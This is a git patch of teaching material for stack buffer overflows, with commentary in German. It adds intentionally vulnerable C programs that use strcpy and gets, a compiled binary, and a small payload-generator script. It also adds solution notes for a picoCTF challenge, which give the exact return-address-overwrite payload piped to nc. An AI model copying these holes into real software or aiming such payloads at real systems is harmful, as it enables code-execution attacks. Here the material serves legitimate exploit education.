From 525e0ca1cc7a5ff4591e5088a1197b5e1d7b787d Mon Sep 17 00:00:00 2001
From: Valentin Brandl <valentin.brandl@ebsnet.de>
Date: Wed, 28 Sep 2022 19:22:48 +0200
Subject: [PATCH] Examples and stuff

---
 assets/logic/.gitignore                      |   1 +
 assets/logic/Makefile                        |  16 +++++++
 assets/{ => logic}/logic.c                   |   6 ++-
 assets/logic/solution.md                     |   8 ++++
 assets/picoctf/buffer_overflow_1/.gitignore  |   1 +
 assets/picoctf/buffer_overflow_1/payload.sh  |  17 ++++++++
 assets/picoctf/buffer_overflow_1/solution.md |  10 +++++
 assets/picoctf/buffer_overflow_1/vuln        | Bin 0 -> 15704 bytes
 assets/picoctf/buffer_overflow_1/vuln.c      |  42 +++++++++++++++++++
 9 files changed, 100 insertions(+), 1 deletion(-)
 create mode 100644 assets/logic/.gitignore
 create mode 100644 assets/logic/Makefile
 rename assets/{ => logic}/logic.c (79%)
 create mode 100644 assets/logic/solution.md
 create mode 100644 assets/picoctf/buffer_overflow_1/.gitignore
 create mode 100755 assets/picoctf/buffer_overflow_1/payload.sh
 create mode 100644 assets/picoctf/buffer_overflow_1/solution.md
 create mode 100644 assets/picoctf/buffer_overflow_1/vuln
 create mode 100644 assets/picoctf/buffer_overflow_1/vuln.c

diff --git a/assets/logic/.gitignore b/assets/logic/.gitignore
new file mode 100644
index 0000000..e2250f7
--- /dev/null
+++ b/assets/logic/.gitignore
@@ -0,0 +1 @@
+logic
diff --git a/assets/logic/Makefile b/assets/logic/Makefile
new file mode 100644
index 0000000..a9a0bc4
--- /dev/null
+++ b/assets/logic/Makefile
@@ -0,0 +1,16 @@
+# use bash so process substutution is available
+CC = gcc
+CFLAGS = -fno-stack-protector -g
+SHELL = bash
+SRC = logic.c
+TARGET = $(SRC:%.c=%)
+
+.PHONY: build
+build: $(TARGET)
+
+%: %.c
+	$(CC) ${CFLAGS} $< -o $@
+
+.PHONY: clean
+clean:
+	rm -f logic
diff --git a/assets/logic.c b/assets/logic/logic.c
similarity index 79%
rename from assets/logic.c
rename to assets/logic/logic.c
index ba6bab4..2812eee 100644
--- a/assets/logic.c
+++ b/assets/logic/logic.c
@@ -3,7 +3,7 @@
 
 void foo(char *input) {
   int is_logged_in = 0;
-  char buf[50];
+  char buf[64];
   strcpy(buf, input);
   if (is_logged_in) {
     puts("logged in!!1!");
@@ -13,5 +13,9 @@ void foo(char *input) {
 }
 
 int main(int argc, char **argv) {
+  if (argc != 2) {
+    return 1;
+  }
   foo(argv[1]);
+  return 0;
 }
diff --git a/assets/logic/solution.md b/assets/logic/solution.md
new file mode 100644
index 0000000..9d56b39
--- /dev/null
+++ b/assets/logic/solution.md
@@ -0,0 +1,8 @@
+# Beispiel 1
+
+ * Debugger `gdb`
+ * `list` für Code
+ * `break <n>` für Breakpoint
+ * `run $(python -c 'print("A"*77)')`
+ * `show is_logged_in`
+ * `continue`
diff --git a/assets/picoctf/buffer_overflow_1/.gitignore b/assets/picoctf/buffer_overflow_1/.gitignore
new file mode 100644
index 0000000..c2981a9
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/.gitignore
@@ -0,0 +1 @@
+payload
diff --git a/assets/picoctf/buffer_overflow_1/payload.sh b/assets/picoctf/buffer_overflow_1/payload.sh
new file mode 100755
index 0000000..c25475a
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/payload.sh
@@ -0,0 +1,17 @@
+#!/usr/bin/env bash
+
+function repeat() {
+  n="${1}"
+  string="${2}"
+  printf "%${n}s" | tr " " "${string}"
+}
+
+function main() {
+  buffer_size="${1}"
+  address="${2}"
+  filler="$(repeat "${buffer_size}" A)"
+  newline="\n"
+  printf "%s%b%b" "${filler}" "${address}" "${newline}"
+}
+
+main "${@}"
diff --git a/assets/picoctf/buffer_overflow_1/solution.md b/assets/picoctf/buffer_overflow_1/solution.md
new file mode 100644
index 0000000..480011c
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/solution.md
@@ -0,0 +1,10 @@
+# PicoCTF - Buffer Overflow 1
+
+https://play.picoctf.org/practice/challenge/258?category=6&page=1
+
+ * Buffergröße bestimmen
+ * Return Adresse überschreiben
+ * Adresse der Zielfunktion finden `nm -g -C vuln`
+ * Little Endian!
+ * `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
+ * `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`
diff --git a/assets/picoctf/buffer_overflow_1/vuln b/assets/picoctf/buffer_overflow_1/vuln
new file mode 100644
index 0000000000000000000000000000000000000000..6b42c3e96d8df7a75398327e6d631b32930c598e
GIT binary patch
literal 15704
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

literal 0
HcmV?d00001

diff --git a/assets/picoctf/buffer_overflow_1/vuln.c b/assets/picoctf/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+